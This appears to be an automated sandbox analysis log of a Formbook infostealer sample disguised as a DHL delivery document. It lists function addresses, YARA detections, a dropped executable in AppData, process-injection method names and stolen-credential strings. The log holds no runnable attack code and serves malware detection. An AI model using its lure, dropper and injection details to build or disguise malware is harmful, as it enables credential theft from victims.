Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015F3497 13_2_015F3497
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015FB730 13_2_015FB730
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015F9950 13_2_015F9950
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_0160B950 13_2_0160B950
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015F5990 13_2_015F5990
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_0165D800 13_2_0165D800
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015F38E0 13_2_015F38E0
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_01665BF0 13_2_01665BF0
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_0162DBF9 13_2_0162DBF9
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_0160FB80 13_2_0160FB80
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_01663A6C 13_2_01663A6C
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015F3D40 13_2_015F3D40
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_0160FDC0 13_2_0160FDC0
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_01609C20 13_2_01609C20
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_01669C32 13_2_01669C32
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015F1F92 13_2_015F1F92
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: 13_2_015F9EB0 13_2_015F9EB0
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Code function: 17_2_02FF7BC3 17_2_02FF7BC3
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Code function: 17_2_02FDA323 17_2_02FDA323
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Code function: 17_2_02FEE663 17_2_02FEE663
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Code function: 17_2_02FE0C43 17_2_02FE0C43
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Code function: 17_2_02FE0C41 17_2_02FE0C41
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Code function: 17_2_02FD85C3 17_2_02FD85C3
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Code function: 17_2_02FDA543 17_2_02FDA543
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CA02C0 18_2_02CA02C0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CC0274 18_2_02CC0274
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CE03E6 18_2_02CE03E6
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C2E3F0 18_2_02C2E3F0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CDA352 18_2_02CDA352
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CB2000 18_2_02CB2000
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CD81CC 18_2_02CD81CC
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CE01AA 18_2_02CE01AA
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CD41A2 18_2_02CD41A2
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CA8158 18_2_02CA8158
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C10100 18_2_02C10100
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CBA118 18_2_02CBA118
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C3C6E0 18_2_02C3C6E0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C1C7C0 18_2_02C1C7C0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C44750 18_2_02C44750
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C20770 18_2_02C20770
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CCE4F6 18_2_02CCE4F6
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CD2446 18_2_02CD2446
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CC4420 18_2_02CC4420
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CE0591 18_2_02CE0591
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C20535 18_2_02C20535
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C1EA80 18_2_02C1EA80
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CD6BD7 18_2_02CD6BD7
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CDAB40 18_2_02CDAB40
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C4E8F0 18_2_02C4E8F0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C068B8 18_2_02C068B8
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C22840 18_2_02C22840
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C2A840 18_2_02C2A840
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C229A0 18_2_02C229A0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CEA9A6 18_2_02CEA9A6
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C36962 18_2_02C36962
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CDEEDB 18_2_02CDEEDB
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C32E90 18_2_02C32E90
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CDCE93 18_2_02CDCE93
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C20E59 18_2_02C20E59
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CDEE26 18_2_02CDEE26
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C12FC8 18_2_02C12FC8
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C2CFE0 18_2_02C2CFE0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C9EFA0 18_2_02C9EFA0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C94F40 18_2_02C94F40
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C62F28 18_2_02C62F28
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C40F30 18_2_02C40F30
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CC2F30 18_2_02CC2F30
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C10CF2 18_2_02C10CF2
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CC0CB5 18_2_02CC0CB5
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C20C00 18_2_02C20C00
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C1ADE0 18_2_02C1ADE0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C38DBF 18_2_02C38DBF
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C2AD00 18_2_02C2AD00
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CBCD1F 18_2_02CBCD1F
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C3B2C0 18_2_02C3B2C0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CC12ED 18_2_02CC12ED
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C252A0 18_2_02C252A0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C6739A 18_2_02C6739A
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C0D34C 18_2_02C0D34C
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CD132D 18_2_02CD132D
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CCF0CC 18_2_02CCF0CC
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C270C0 18_2_02C270C0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CD70E9 18_2_02CD70E9
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CDF0E0 18_2_02CDF0E0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C2B1B0 18_2_02C2B1B0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CEB16B 18_2_02CEB16B
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C5516C 18_2_02C5516C
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C0F172 18_2_02C0F172
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CD16CC 18_2_02CD16CC
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C65630 18_2_02C65630
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CDF7B0 18_2_02CDF7B0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C11460 18_2_02C11460
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CDF43F 18_2_02CDF43F
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CE95C3 18_2_02CE95C3
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CBD5B0 18_2_02CBD5B0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CD7571 18_2_02CD7571
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CCDAC6 18_2_02CCDAC6
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C65AA0 18_2_02C65AA0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CBDAAC 18_2_02CBDAAC
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CC1AA3 18_2_02CC1AA3
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CDFA49 18_2_02CDFA49
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CD7A46 18_2_02CD7A46
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C93A6C 18_2_02C93A6C
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C95BF0 18_2_02C95BF0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C5DBF9 18_2_02C5DBF9
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C3FB80 18_2_02C3FB80
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CDFB76 18_2_02CDFB76
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C238E0 18_2_02C238E0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C8D800 18_2_02C8D800
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C29950 18_2_02C29950
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C3B950 18_2_02C3B950
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CB5910 18_2_02CB5910
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C29EB0 18_2_02C29EB0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C21F92 18_2_02C21F92
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02BE3FD5 18_2_02BE3FD5
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02BE3FD2 18_2_02BE3FD2
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CDFFB1 18_2_02CDFFB1
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CDFF09 18_2_02CDFF09
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CDFCF2 18_2_02CDFCF2
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C99C32 18_2_02C99C32
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C3FDC0 18_2_02C3FDC0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02C23D40 18_2_02C23D40
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CD1D5A 18_2_02CD1D5A
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_02CD7D73 18_2_02CD7D73
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_00421A30 18_2_00421A30
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_0043A4E0 18_2_0043A4E0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_0041CC40 18_2_0041CC40
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_0041CE60 18_2_0041CE60
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_0041AEE0 18_2_0041AEE0
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_00430F80 18_2_00430F80
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_0041B0B8 18_2_0041B0B8
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_0042355E 18_2_0042355E
Source: C:\Windows\SysWOW64\setx.exe Code function: 18_2_00423560 18_2_00423560
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\setx.exe Code function: String function: 02C55130 appears 58 times
Source: C:\Windows\SysWOW64\setx.exe Code function: String function: 02C9F290 appears 105 times
Source: C:\Windows\SysWOW64\setx.exe Code function: String function: 02C8EA12 appears 86 times
Source: C:\Windows\SysWOW64\setx.exe Code function: String function: 02C0B970 appears 280 times
Source: C:\Windows\SysWOW64\setx.exe Code function: String function: 02C67E54 appears 111 times
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: String function: 01C8EA12 appears 86 times
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: String function: 01C55130 appears 58 times
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: String function: 01C0B970 appears 280 times
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: String function: 01C67E54 appears 111 times
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Code function: String function: 01C9F290 appears 105 times
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: String function: 0165EA12 appears 36 times
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Code function: String function: 01637E54 appears 97 times
Sample file is different than original file name gathered from version info
Source: DHL_Delivery Documents.exe, 00000000.00000002.2086231730.0000000005350000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs DHL_Delivery Documents.exe
Source: DHL_Delivery Documents.exe, 00000000.00000002.2078783372.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs DHL_Delivery Documents.exe
Source: DHL_Delivery Documents.exe, 00000000.00000002.2090689582.00000000062C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs DHL_Delivery Documents.exe
Source: DHL_Delivery Documents.exe, 00000000.00000002.2089429532.0000000005644000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs DHL_Delivery Documents.exe
Source: DHL_Delivery Documents.exe, 00000000.00000000.2034582111.0000000000AB8000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameJeWB.exeF vs DHL_Delivery Documents.exe
Source: DHL_Delivery Documents.exe, 00000008.00000002.2633141011.0000000001D0D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs DHL_Delivery Documents.exe
Source: DHL_Delivery Documents.exe, 00000008.00000002.2632980952.00000000017A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesetx.exej% vs DHL_Delivery Documents.exe
Source: DHL_Delivery Documents.exe, 00000008.00000002.2632980952.0000000001788000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesetx.exej% vs DHL_Delivery Documents.exe
Source: DHL_Delivery Documents.exe Binary or memory string: OriginalFilenameJeWB.exeF vs DHL_Delivery Documents.exe
Uses 32bit PE files
Source: DHL_Delivery Documents.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: DHL_Delivery Documents.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: YybGLWQSx.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, RU6c2kU9YKG76GBYRe.cs Security API names: _0020.SetAccessControl
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, RU6c2kU9YKG76GBYRe.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, RU6c2kU9YKG76GBYRe.cs Security API names: _0020.AddAccessRule
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, W3yVFhmE2W66Gxi81U.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, RU6c2kU9YKG76GBYRe.cs Security API names: _0020.SetAccessControl
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, RU6c2kU9YKG76GBYRe.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, RU6c2kU9YKG76GBYRe.cs Security API names: _0020.AddAccessRule
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, W3yVFhmE2W66Gxi81U.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 9.2.YybGLWQSx.exe.24be2c4.0.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 9.2.YybGLWQSx.exe.24ae2b8.1.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.DHL_Delivery Documents.exe.2e6e2f0.1.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.DHL_Delivery Documents.exe.5520000.4.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.DHL_Delivery Documents.exe.2e5e2d8.0.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@23/16@7/2
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe File created: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:380:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4352:120:WilError_03
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe File created: C:\Users\user\AppData\Local\Temp\tmp3106.tmp Jump to behavior
Source: DHL_Delivery Documents.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DHL_Delivery Documents.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: DHL_Delivery Documents.exe, 00000000.00000000.2034502346.00000000009D2000.00000002.00000001.01000000.00000003.sdmp, setx.exe, 00000012.00000002.3280726752.000000000320C000.00000004.10000000.00040000.00000000.sdmp, setx.exe, 00000012.00000002.3279879258.000000000298E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.2997835182.000000000DC0C000.00000004.80000000.00040000.00000000.sdmp, YybGLWQSx.exe.0.dr Binary or memory string: UPDATE [patient] SET [patientId] = @patientId, [firstName] = @firstName, [lastName] = @lastName, [mobileNumber] = @mobileNumber, [email] = @email, [userName] = @userName, [password] = @password WHERE (([patientId] = @Original_patientId) AND ([firstName] = @Original_firstName) AND ([lastName] = @Original_lastName) AND ((@IsNull_mobileNumber = 1 AND [mobileNumber] IS NULL) OR ([mobileNumber] = @Original_mobileNumber)) AND ([email] = @Original_email) AND ([userName] = @Original_userName) AND ([password] = @Original_password));
Source: DHL_Delivery Documents.exe, 00000000.00000000.2034502346.00000000009D2000.00000002.00000001.01000000.00000003.sdmp, setx.exe, 00000012.00000002.3280726752.000000000320C000.00000004.10000000.00040000.00000000.sdmp, setx.exe, 00000012.00000002.3279879258.000000000298E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.2997835182.000000000DC0C000.00000004.80000000.00040000.00000000.sdmp, YybGLWQSx.exe.0.dr Binary or memory string: UPDATE [patient] SET [userName] = @userName, [password] = @password, [patientId] = @patientId WHERE (([userName] = @Original_userName) AND ([password] = @Original_password) AND ([patientId] = @Original_patientId));
Source: DHL_Delivery Documents.exe, 00000000.00000000.2034502346.00000000009D2000.00000002.00000001.01000000.00000003.sdmp, setx.exe, 00000012.00000002.3280726752.000000000320C000.00000004.10000000.00040000.00000000.sdmp, setx.exe, 00000012.00000002.3279879258.000000000298E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.2997835182.000000000DC0C000.00000004.80000000.00040000.00000000.sdmp, YybGLWQSx.exe.0.dr Binary or memory string: INSERT INTO [patient] ([patientId], [firstName], [lastName], [mobileNumber], [email], [userName], [password]) VALUES (@patientId, @firstName, @lastName, @mobileNumber, @email, @userName, @password);
Source: setx.exe, 00000012.00000002.3278866707.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3278866707.0000000000705000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3278866707.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2891782711.00000000006D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: DHL_Delivery Documents.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe File read: C:\Users\user\Desktop\DHL_Delivery Documents.exe Jump to behavior
